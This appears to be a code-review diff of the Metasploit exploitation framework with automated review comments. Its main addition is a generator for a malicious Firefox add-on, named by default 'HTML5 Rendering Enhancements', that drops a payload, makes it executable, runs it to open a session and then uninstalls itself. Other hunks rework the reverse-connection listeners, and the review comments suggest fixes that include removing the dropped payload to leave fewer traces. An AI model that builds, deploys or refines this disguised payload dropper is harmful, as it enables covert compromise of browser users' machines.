# Dumps the list of running jobs.
|
||||||
#
|
#
|
||||||
# If verbose is true, also prints the payload, LPORT, URIPATH and start
|
# @param framework [Msf::Framework] the framework.
|
||||||
# time, if they exist, for each job.
|
# @param verbose [Boolean] if true, also prints the payload, LPORT, URIPATH
|
||||||
#
|
# and start time, if they exist, for each job.
|
||||||
|
# @param indent [Integer] the indentation amount.
|
||||||
|
# @param col [Integer] the column wrap width.
|
||||||
|
# @return [String] the formatted list of running jobs.
|
||||||
def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap)
|
def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap)
|
||||||
columns = [ 'Id', 'Name' ]
|
columns = [ 'Id', 'Name' ]
|
||||||
|
|
||||||
|
@ -479,10 +530,13 @@ class ReadableText
|
||||||
return framework.jobs.keys.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active jobs.\n"
|
return framework.jobs.keys.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active jobs.\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Jacked from Ernest Ellingson <erne [at] powernav.com>, modified
|
# Jacked from Ernest Ellingson <erne [at] powernav.com>, modified
|
||||||
# a bit to add indention
|
# a bit to add indention
|
||||||
#
|
#
|
||||||
|
# @param str [String] the string to wrap.
|
||||||
|
# @param indent [Integer] the indentation amount.
|
||||||
|
# @param col [Integer] the column wrap width.
|
||||||
|
# @return [String] the wrapped string.
|
||||||
def self.word_wrap(str, indent = DefaultIndent, col = DefaultColumnWrap)
|
def self.word_wrap(str, indent = DefaultIndent, col = DefaultColumnWrap)
|
||||||
return Rex::Text.wordwrap(str, indent, col)
|
return Rex::Text.wordwrap(str, indent, col)
|
||||||
end
|
end
|
||||||
|
|
|
@ -98,4 +98,7 @@ require 'msf/core/exploit/winrm'
|
||||||
# WebApp
|
# WebApp
|
||||||
require 'msf/core/exploit/web'
|
require 'msf/core/exploit/web'
|
||||||
|
|
||||||
|
# Firefox addons
|
||||||
|
require 'msf/core/exploit/remote/firefox_addon_generator'
|
||||||
|
|
||||||
require 'msf/core/exploit/remote/browser_exploit_server'
|
require 'msf/core/exploit/remote/browser_exploit_server'
|
||||||
|
|
|
@ -92,6 +92,15 @@ module Msf
|
||||||
"#{get_resource.chomp("/")}/#{@exploit_receiver_page}"
|
"#{get_resource.chomp("/")}/#{@exploit_receiver_page}"
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Returns the absolute URL to the module's resource that points to on_request_exploit
|
||||||
|
#
|
||||||
|
# @return [String] absolute URI to the exploit page
|
||||||
|
#
|
||||||
|
def get_module_uri
|
||||||
|
"#{get_uri.chomp("/")}/#{@exploit_receiver_page}"
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Returns the current target
|
# Returns the current target
|
||||||
#
|
#
|
||||||
|
@ -166,8 +175,10 @@ module Msf
|
||||||
# Special keys to ignore because the script registers this as [:activex] = true or false
|
# Special keys to ignore because the script registers this as [:activex] = true or false
|
||||||
next if k == :clsid or k == :method
|
next if k == :clsid or k == :method
|
||||||
|
|
||||||
if v.class == Regexp
|
if v.is_a? Regexp
|
||||||
bad_reqs << k if profile[k.to_sym] !~ v
|
bad_reqs << k if profile[k.to_sym] !~ v
|
||||||
|
elsif v.is_a? Proc
|
||||||
|
bad_reqs << k unless v.call(profile[k.to_sym])
|
||||||
else
|
else
|
||||||
bad_reqs << k if profile[k.to_sym] != v
|
bad_reqs << k if profile[k.to_sym] != v
|
||||||
end
|
end
|
||||||
|
|
|
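Review bot: The new Proc branch `bad_reqs << k unless v.call(profile[k.to_sym])` hands the proc a nil whenever the browser profile never recorded key `k`, whereas the Regexp and equality branches already treat a missing value as an unmet requirement (`nil !~ v` and `nil != v` both evaluate true); a requirement proc that calls a method on its argument would therefore raise NoMethodError out of the requirement check instead of simply failing it. Treat nil uniformly before dispatching: `bad_reqs << k if profile[k.to_sym].nil? || !v.call(profile[k.to_sym])`. The enclosing requirements loop starts and ends outside this hunk, so the origin of `profile`, `k` and `v` is inferred from the context lines.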
@ -0,0 +1,174 @@
|
||||||
|
# -*- coding: binary -*-
|
||||||
|
|
||||||
|
###
|
||||||
|
#
|
||||||
|
# The FirefoxAddonGenerator allows a firefox exploit module to serve a malicious .xpi
|
||||||
|
# addon that will gain a session.
|
||||||
|
#
|
||||||
|
###
|
||||||
|
|
||||||
|
module Msf
|
||||||
|
module Exploit::Remote::FirefoxAddonGenerator
|
||||||
|
|
||||||
|
# Add in the supported datastore options
|
||||||
|
def initialize( info = {} )
|
||||||
|
super(update_info(info,
|
||||||
|
'Platform' => %w{ java linux osx solaris win },
|
||||||
|
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
[ 'Generic (Java Payload)',
|
||||||
|
{
|
||||||
|
'Platform' => ['java'],
|
||||||
|
'Arch' => ARCH_JAVA
|
||||||
|
}
|
||||||
|
],
|
||||||
|
[ 'Windows x86 (Native Payload)',
|
||||||
|
{
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Arch' => ARCH_X86,
|
||||||
|
}
|
||||||
|
],
|
||||||
|
[ 'Linux x86 (Native Payload)',
|
||||||
|
{
|
||||||
|
'Platform' => 'linux',
|
||||||
|
'Arch' => ARCH_X86,
|
||||||
|
}
|
||||||
|
],
|
||||||
|
[ 'Mac OS X PPC (Native Payload)',
|
||||||
|
{
|
||||||
|
'Platform' => 'osx',
|
||||||
|
'Arch' => ARCH_PPC,
|
||||||
|
}
|
||||||
|
],
|
||||||
|
[ 'Mac OS X x86 (Native Payload)',
|
||||||
|
{
|
||||||
|
'Platform' => 'osx',
|
||||||
|
'Arch' => ARCH_X86,
|
||||||
|
}
|
||||||
|
]
|
||||||
|
],
|
||||||
|
'DefaultTarget' => 1
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options( [
|
||||||
|
OptString.new('ADDONNAME', [ true,
|
||||||
|
"The addon name.",
|
||||||
|
"HTML5 Rendering Enhancements"
|
||||||
|
]),
|
||||||
|
OptBool.new('AutoUninstall', [ true,
|
||||||
|
"Automatically uninstall the addon after payload execution",
|
||||||
|
true
|
||||||
|
])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
# @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the
|
||||||
|
# 'application/x-xpinstall' MIME type
|
||||||
|
def generate_addon_xpi
|
||||||
|
if target.name == 'Generic (Java Payload)'
|
||||||
|
jar = p.encoded_jar
|
||||||
|
jar.build_manifest(:main_class => "metasploit.Payload")
|
||||||
|
payload_file = jar.pack
|
||||||
|
payload_name='payload.jar'
|
||||||
|
payload_script=%q|
|
||||||
|
var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java
|
||||||
|
java.lang.System.setSecurityManager(null);
|
||||||
|
var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]);
|
||||||
|
var m = cl.loadClass("metasploit.Payload").getMethod("main", [java.lang.Class.forName("[Ljava.lang.String;")]);
|
||||||
|
m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]);
|
||||||
|
|
|
||||||
|
else
|
||||||
|
payload_file = generate_payload_exe
|
||||||
|
payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
|
||||||
|
payload_script=%q|
|
||||||
|
var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
|
||||||
|
process.init(tmp);
|
||||||
|
process.run(false,[],0);
|
||||||
|
|
|
||||||
|
if target.name != 'Windows x86 (Native Payload)'
|
||||||
|
payload_script = %q|
|
||||||
|
var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
|
||||||
|
chmod.initWithPath("/bin/chmod");
|
||||||
|
var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
|
||||||
|
process.init(chmod);
|
||||||
|
process.run(true, ["+x", tmp.path], 2);
|
||||||
|
| + payload_script
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
zip = Rex::Zip::Archive.new
|
||||||
|
xpi_guid = Rex::Text.rand_guid
|
||||||
|
bootstrap_script = %q|
|
||||||
|
function startup(data, reason) {
|
||||||
|
var file = Components.classes["@mozilla.org/file/directory_service;1"].
|
||||||
|
getService(Components.interfaces.nsIProperties).
|
||||||
|
get("ProfD", Components.interfaces.nsIFile);
|
||||||
|
file.append("extensions");
|
||||||
|
|
|
||||||
|
bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|
|
||||||
|
bootstrap_script << %Q|payload_name="#{payload_name}";|
|
||||||
|
bootstrap_script << %q|
|
||||||
|
file.append(xpi_guid);
|
||||||
|
file.append(payload_name);
|
||||||
|
var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
|
||||||
|
getService(Components.interfaces.nsIProperties).
|
||||||
|
get("TmpD", Components.interfaces.nsIFile);
|
||||||
|
tmp.append(payload_name);
|
||||||
|
tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
|
||||||
|
file.copyTo(tmp.parent, tmp.leafName);
|
||||||
|
|
|
||||||
|
bootstrap_script << payload_script
|
||||||
|
|
||||||
|
if (datastore['AutoUninstall'])
|
||||||
|
bootstrap_script << %q|
|
||||||
|
try { // Fx < 4.0
|
||||||
|
Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
|
||||||
|
} catch (e) {}
|
||||||
|
try { // Fx 4.0 and later
|
||||||
|
Components.utils.import("resource://gre/modules/AddonManager.jsm");
|
||||||
|
AddonManager.getAddonByID(xpi_guid, function(addon) {
|
||||||
|
addon.uninstall();
|
||||||
|
});
|
||||||
|
} catch (e) {}
|
||||||
|
|
|
||||||
|
end
|
||||||
|
|
||||||
|
bootstrap_script << "}"
|
||||||
|
|
||||||
|
zip.add_file('bootstrap.js', bootstrap_script)
|
||||||
|
zip.add_file(payload_name, payload_file)
|
||||||
|
zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n")
|
||||||
|
zip.add_file('install.rdf', %Q|<?xml version="1.0"?>
|
||||||
|
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
|
||||||
|
<Description about="urn:mozilla:install-manifest">
|
||||||
|
<em:id>#{xpi_guid}</em:id>
|
||||||
|
<em:name>#{datastore['ADDONNAME']}</em:name>
|
||||||
|
<em:version>1.0</em:version>
|
||||||
|
<em:bootstrap>true</em:bootstrap>
|
||||||
|
<em:unpack>true</em:unpack>
|
||||||
|
<em:targetApplication>
|
||||||
|
<Description>
|
||||||
|
<em:id>toolkit@mozilla.org</em:id>
|
||||||
|
<em:minVersion>1.0</em:minVersion>
|
||||||
|
<em:maxVersion>*</em:maxVersion>
|
||||||
|
</Description>
|
||||||
|
</em:targetApplication>
|
||||||
|
<em:targetApplication>
|
||||||
|
<Description>
|
||||||
|
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
|
||||||
|
<em:minVersion>1.0</em:minVersion>
|
||||||
|
<em:maxVersion>*</em:maxVersion>
|
||||||
|
</Description>
|
||||||
|
</em:targetApplication>
|
||||||
|
</Description>
|
||||||
|
</RDF>|)
|
||||||
|
zip.add_file('overlay.xul', %q|<?xml version="1.0"?>
|
||||||
|
<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
|
||||||
|
<script src="bootstrap.js"/>
|
||||||
|
<script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script>
|
||||||
|
</overlay>|)
|
||||||
|
zip
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
|
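Review bot: `datastore['ADDONNAME']` is interpolated straight into the `<em:name>` element of install.rdf, so an operator-supplied name containing `&`, `<` or `"` produces malformed RDF and the add-on is rejected at install time; escape it (`CGI.escapeHTML(datastore['ADDONNAME'])`, stdlib) or validate the option against a safe character set. Separately, the dropped payload is created with `tmp.createUnique(..., 0666)` in the shared TmpD directory and is never removed, so even with AutoUninstall the executable stays behind as a world-readable artifact, and on a multi-user host a world-writable file could be swapped between `copyTo` and `process.run` (umask may tighten the mode — not verifiable from here). A mode of `0600` plus a `tmp.remove(false)` once the payload has been launched (the native branch runs it non-blocking, so the deletion must be deferred) would match the cleanup intent of the AutoUninstall option.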
@ -83,23 +83,10 @@ module ReverseHttp
|
||||||
# addresses.
|
# addresses.
|
||||||
#
|
#
|
||||||
def full_uri
|
def full_uri
|
||||||
unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty?
|
addrs = bind_address
|
||||||
lhost = datastore['HIDDENHOST']
|
local_port = bind_port
|
||||||
else
|
|
||||||
lhost = datastore['LHOST']
|
|
||||||
end
|
|
||||||
if lhost.empty? or lhost == "0.0.0.0" or lhost == "::"
|
|
||||||
lhost = Rex::Socket.source_address
|
|
||||||
end
|
|
||||||
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
|
|
||||||
scheme = (ssl?) ? "https" : "http"
|
scheme = (ssl?) ? "https" : "http"
|
||||||
unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0
|
"#{scheme}://#{addrs[0]}:#{local_port}/"
|
||||||
uri = "#{scheme}://#{lhost}:#{datastore["HIDDENPORT"]}/"
|
|
||||||
else
|
|
||||||
uri = "#{scheme}://#{lhost}:#{datastore["LPORT"]}/"
|
|
||||||
end
|
|
||||||
|
|
||||||
uri
|
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
|
@ -163,6 +150,7 @@ module ReverseHttp
|
||||||
OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]),
|
OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]),
|
||||||
OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]),
|
OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]),
|
||||||
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
|
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
|
||||||
|
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
|
||||||
OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>' ])
|
OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>' ])
|
||||||
], Msf::Handler::ReverseHttp)
|
], Msf::Handler::ReverseHttp)
|
||||||
end
|
end
|
||||||
|
@ -186,17 +174,13 @@ module ReverseHttp
|
||||||
comm = nil
|
comm = nil
|
||||||
end
|
end
|
||||||
|
|
||||||
# Determine where to bind the HTTP(S) server to
|
local_port = bind_port
|
||||||
bindaddrs = ipv6 ? '::' : '0.0.0.0'
|
addrs = bind_address
|
||||||
|
|
||||||
if not datastore['ReverseListenerBindAddress'].to_s.empty?
|
|
||||||
bindaddrs = datastore['ReverseListenerBindAddress']
|
|
||||||
end
|
|
||||||
|
|
||||||
# Start the HTTPS server service on this host/port
|
# Start the HTTPS server service on this host/port
|
||||||
self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server,
|
self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server,
|
||||||
datastore['LPORT'].to_i,
|
local_port,
|
||||||
bindaddrs,
|
addrs[0],
|
||||||
ssl?,
|
ssl?,
|
||||||
{
|
{
|
||||||
'Msf' => framework,
|
'Msf' => framework,
|
||||||
|
@ -413,6 +397,33 @@ protected
|
||||||
obj.service.close_client( cli )
|
obj.service.close_client( cli )
|
||||||
end
|
end
|
||||||
|
|
||||||
|
protected
|
||||||
|
|
||||||
|
def bind_port
|
||||||
|
port = datastore['ReverseListenerBindPort'].to_i
|
||||||
|
port > 0 ? port : datastore['LPORT'].to_i
|
||||||
|
end
|
||||||
|
|
||||||
|
def bind_address
|
||||||
|
# Switch to IPv6 ANY address if the LHOST is also IPv6
|
||||||
|
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
|
||||||
|
# First attempt to bind LHOST. If that fails, the user probably has
|
||||||
|
# something else listening on that interface. Try again with ANY_ADDR.
|
||||||
|
any = (addr.length == 4) ? "0.0.0.0" : "::0"
|
||||||
|
|
||||||
|
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
|
||||||
|
|
||||||
|
if not datastore['ReverseListenerBindAddress'].to_s.empty?
|
||||||
|
# Only try to bind to this specific interface
|
||||||
|
addrs = [ datastore['ReverseListenerBindAddress'] ]
|
||||||
|
|
||||||
|
# Pick the right "any" address if either wildcard is used
|
||||||
|
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
|
||||||
|
end
|
||||||
|
|
||||||
|
addrs
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
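Review bot: The rewritten `full_uri` builds the stager's callback URL from `bind_address[0]` and `bind_port`, i.e. the listener side rather than the address the payload must reach: with `ReverseListenerBindAddress`/`ReverseListenerBindPort` set — the NAT or port-forwarded case those options exist for — the generated stager now calls back to the internal bind address and port instead of LHOST:LPORT, and the removed `0.0.0.0`/`::` to `Rex::Socket.source_address` fallback and the IPv6 `[addr]` bracketing are gone too, so an LHOST of `0.0.0.0` yields `http://0.0.0.0:port/`. The callback URI should keep deriving from LHOST/LPORT as the removed lines did, with `bind_address`/`bind_port` reserved for the `Rex::ServiceManager.start` call in the setup hunk. The comment above the method describing the address handling continues outside this hunk.
```ruby
def full_uri
  lhost = datastore['LHOST'].to_s
  if lhost.empty? or lhost == "0.0.0.0" or lhost == "::"
    lhost = Rex::Socket.source_address
  end
  lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
  scheme = (ssl?) ? "https" : "http"
  "#{scheme}://#{lhost}:#{datastore['LPORT']}/"
end
```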
@ -42,13 +42,17 @@ module ReverseHttpsProxy
|
||||||
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
|
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
|
||||||
OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
|
OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
|
||||||
OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
|
OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
|
||||||
OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]),
|
|
||||||
OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]),
|
|
||||||
OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
|
OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
|
||||||
OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
|
OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
|
||||||
OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
|
OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
|
||||||
], Msf::Handler::ReverseHttpsProxy)
|
], Msf::Handler::ReverseHttpsProxy)
|
||||||
|
|
||||||
|
register_advanced_options(
|
||||||
|
[
|
||||||
|
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
|
||||||
|
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])
|
||||||
|
], Msf::Handler::ReverseHttpsProxy)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
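Review bot: Dropping `HIDDENHOST`/`HIDDENPORT` removes the only way this handler had to point a stager at a Tor hidden service distinct from the listener, and nothing visible here would warn a resource script that still sets them. If the removal is intended, the option descriptions or the commit message should say how that case is now covered — the `ReverseListenerBindAddress`/`ReverseListenerBindPort` options added here describe the local bind side, not the address embedded in the stager; otherwise keep the two options, for instance in the new `register_advanced_options` group. The `register_options` call starts outside this hunk.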
@ -53,8 +53,9 @@ module ReverseTcp
|
||||||
[
|
[
|
||||||
OptInt.new('ReverseConnectRetries', [ true, 'The number of connection attempts to try before exiting the process', 5 ]),
|
OptInt.new('ReverseConnectRetries', [ true, 'The number of connection attempts to try before exiting the process', 5 ]),
|
||||||
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
|
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
|
||||||
|
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
|
||||||
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
|
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
|
||||||
OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]),
|
OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false])
|
||||||
], Msf::Handler::ReverseTcp)
|
], Msf::Handler::ReverseTcp)
|
||||||
|
|
||||||
|
|
||||||
|
@ -72,13 +73,6 @@ module ReverseTcp
|
||||||
end
|
end
|
||||||
|
|
||||||
ex = false
|
ex = false
|
||||||
# Switch to IPv6 ANY address if the LHOST is also IPv6
|
|
||||||
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
|
|
||||||
# First attempt to bind LHOST. If that fails, the user probably has
|
|
||||||
# something else listening on that interface. Try again with ANY_ADDR.
|
|
||||||
any = (addr.length == 4) ? "0.0.0.0" : "::0"
|
|
||||||
|
|
||||||
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
|
|
||||||
|
|
||||||
comm = datastore['ReverseListenerComm']
|
comm = datastore['ReverseListenerComm']
|
||||||
if comm.to_s == "local"
|
if comm.to_s == "local"
|
||||||
|
@ -87,19 +81,15 @@ module ReverseTcp
|
||||||
comm = nil
|
comm = nil
|
||||||
end
|
end
|
||||||
|
|
||||||
if not datastore['ReverseListenerBindAddress'].to_s.empty?
|
local_port = bind_port
|
||||||
# Only try to bind to this specific interface
|
addrs = bind_address
|
||||||
addrs = [ datastore['ReverseListenerBindAddress'] ]
|
|
||||||
|
|
||||||
# Pick the right "any" address if either wildcard is used
|
|
||||||
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
|
|
||||||
end
|
|
||||||
addrs.each { |ip|
|
addrs.each { |ip|
|
||||||
begin
|
begin
|
||||||
|
|
||||||
self.listener_sock = Rex::Socket::TcpServer.create(
|
self.listener_sock = Rex::Socket::TcpServer.create(
|
||||||
'LocalHost' => ip,
|
'LocalHost' => ip,
|
||||||
'LocalPort' => datastore['LPORT'].to_i,
|
'LocalPort' => local_port,
|
||||||
'Comm' => comm,
|
'Comm' => comm,
|
||||||
'Context' =>
|
'Context' =>
|
||||||
{
|
{
|
||||||
|
@ -119,11 +109,11 @@ module ReverseTcp
|
||||||
via = ""
|
via = ""
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Started reverse handler on #{ip}:#{datastore['LPORT']} #{via}")
|
print_status("Started reverse handler on #{ip}:#{local_port} #{via}")
|
||||||
break
|
break
|
||||||
rescue
|
rescue
|
||||||
ex = $!
|
ex = $!
|
||||||
print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}")
|
print_error("Handler failed to bind to #{ip}:#{local_port}")
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
raise ex if (ex)
|
raise ex if (ex)
|
||||||
|
@ -140,7 +130,8 @@ module ReverseTcp
|
||||||
# Starts monitoring for an inbound connection.
|
# Starts monitoring for an inbound connection.
|
||||||
#
|
#
|
||||||
def start_handler
|
def start_handler
|
||||||
self.listener_thread = framework.threads.spawn("ReverseTcpHandlerListener-#{datastore['LPORT']}", false) {
|
local_port = bind_port
|
||||||
|
self.listener_thread = framework.threads.spawn("ReverseTcpHandlerListener-#{local_port}", false) {
|
||||||
client = nil
|
client = nil
|
||||||
|
|
||||||
begin
|
begin
|
||||||
|
@ -159,7 +150,7 @@ module ReverseTcp
|
||||||
end while true
|
end while true
|
||||||
}
|
}
|
||||||
|
|
||||||
self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{datastore['LPORT']}", false) {
|
self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{local_port}", false) {
|
||||||
while true
|
while true
|
||||||
client = self.handler_queue.pop
|
client = self.handler_queue.pop
|
||||||
begin
|
begin
|
||||||
|
@ -241,6 +232,31 @@ module ReverseTcp
|
||||||
|
|
||||||
protected
|
protected
|
||||||
|
|
||||||
|
def bind_port
|
||||||
|
port = datastore['ReverseListenerBindPort'].to_i
|
||||||
|
port > 0 ? port : datastore['LPORT'].to_i
|
||||||
|
end
|
||||||
|
|
||||||
|
def bind_address
|
||||||
|
# Switch to IPv6 ANY address if the LHOST is also IPv6
|
||||||
|
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
|
||||||
|
# First attempt to bind LHOST. If that fails, the user probably has
|
||||||
|
# something else listening on that interface. Try again with ANY_ADDR.
|
||||||
|
any = (addr.length == 4) ? "0.0.0.0" : "::0"
|
||||||
|
|
||||||
|
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
|
||||||
|
|
||||||
|
if not datastore['ReverseListenerBindAddress'].to_s.empty?
|
||||||
|
# Only try to bind to this specific interface
|
||||||
|
addrs = [ datastore['ReverseListenerBindAddress'] ]
|
||||||
|
|
||||||
|
# Pick the right "any" address if either wildcard is used
|
||||||
|
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
|
||||||
|
end
|
||||||
|
|
||||||
|
addrs
|
||||||
|
end
|
||||||
|
|
||||||
attr_accessor :listener_sock # :nodoc:
|
attr_accessor :listener_sock # :nodoc:
|
||||||
attr_accessor :listener_thread # :nodoc:
|
attr_accessor :listener_thread # :nodoc:
|
||||||
attr_accessor :handler_thread # :nodoc:
|
attr_accessor :handler_thread # :nodoc:
|
||||||
|
|
|
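Review bot: In the new `bind_address` helper the wildcard test `addrs[0] == "0.0.0.0" or addrs == "::0"` compares the whole array to a string in its second half, so a `ReverseListenerBindAddress` of `::0` is never normalised; the check should read `addrs[0] == "0.0.0.0" or addrs[0] == "::0" or addrs[0] == "::"`. Note that `any` is chosen from LHOST's address family, so once the comparison is fixed an IPv6 wildcard bind address with an IPv4 LHOST would be rewritten to `0.0.0.0` — if that mix is meant to work, derive `any` from the bind address (`Rex::Socket.is_ipv6?(addrs[0])`) rather than from LHOST, and say so in the comment. The slip is carried verbatim from the removed lines above and into the ReverseHttp and ReverseTcpSsl copies.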
@ -43,7 +43,9 @@ module ReverseTcpSsl
|
||||||
super
|
super
|
||||||
register_advanced_options(
|
register_advanced_options(
|
||||||
[
|
[
|
||||||
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)'])
|
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']),
|
||||||
|
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
|
||||||
|
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])
|
||||||
], Msf::Handler::ReverseTcpSsl)
|
], Msf::Handler::ReverseTcpSsl)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
@ -59,13 +61,6 @@ module ReverseTcpSsl
|
||||||
end
|
end
|
||||||
|
|
||||||
ex = false
|
ex = false
|
||||||
# Switch to IPv6 ANY address if the LHOST is also IPv6
|
|
||||||
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
|
|
||||||
# First attempt to bind LHOST. If that fails, the user probably has
|
|
||||||
# something else listening on that interface. Try again with ANY_ADDR.
|
|
||||||
any = (addr.length == 4) ? "0.0.0.0" : "::0"
|
|
||||||
|
|
||||||
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
|
|
||||||
|
|
||||||
comm = datastore['ReverseListenerComm']
|
comm = datastore['ReverseListenerComm']
|
||||||
if comm.to_s == "local"
|
if comm.to_s == "local"
|
||||||
|
@ -74,20 +69,16 @@ module ReverseTcpSsl
|
||||||
comm = nil
|
comm = nil
|
||||||
end
|
end
|
||||||
|
|
||||||
if not datastore['ReverseListenerBindAddress'].to_s.empty?
|
local_port = bind_port
|
||||||
# Only try to bind to this specific interface
|
addrs = bind_address
|
||||||
addrs = [ datastore['ReverseListenerBindAddress'] ]
|
|
||||||
|
|
||||||
# Pick the right "any" address if either wildcard is used
|
|
||||||
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
|
|
||||||
end
|
|
||||||
addrs.each { |ip|
|
addrs.each { |ip|
|
||||||
begin
|
begin
|
||||||
|
|
||||||
comm.extend(Rex::Socket::SslTcp)
|
comm.extend(Rex::Socket::SslTcp)
|
||||||
